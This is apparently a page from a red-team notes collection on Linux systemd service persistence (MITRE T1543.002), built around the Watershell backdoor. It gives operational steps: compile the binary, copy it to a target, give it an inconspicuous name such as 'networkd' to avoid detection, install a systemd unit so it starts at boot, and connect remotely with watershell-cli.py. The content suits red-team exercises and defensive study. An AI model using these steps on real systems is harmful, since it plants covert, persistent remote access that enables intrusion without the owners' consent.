Systemd Service Persistence

MITRE ATT&CK, Persistence, Sub-technique T1543.002

The following example demonstrates Systemd persistence with Watershell.

Watershell is an incredible script that I came across from a fellow red teamer during CCDC Regionals. I highly recommend reading the original GitHub to learn more about the tool.

General steps for persistence with Watershell:

Compile the binary:

g++ main.cpp watershell.cpp -o ${INSERT_BINARY_NAME}

2. Note: You can edit the default port that the binary uses in the main.cpp and watershell.cpp files prior to compiling.

3. Transfer the binary to the targets system, I recommend naming the binary something inconspicuous such as networkd or ipv6_conf

4. Setup a service to execute the binary, the following demonstrates an example configuration:

[Unit]
Description=persistence

[Service]
Type=simple
ExecStart=/bin/networkd -l $port

[Install]
WantedBy=multi-user.target

5. Connect to the target using watershell-cli.py using the following command:

python3 watershell-cli.py -t $ip -p $port

References

ATT&CK T1501: Understanding Systemd Service PersistenceRed Canary

PreviousService Privilege Escalation / Persistence NextWeb Shell

Last updated 2 years ago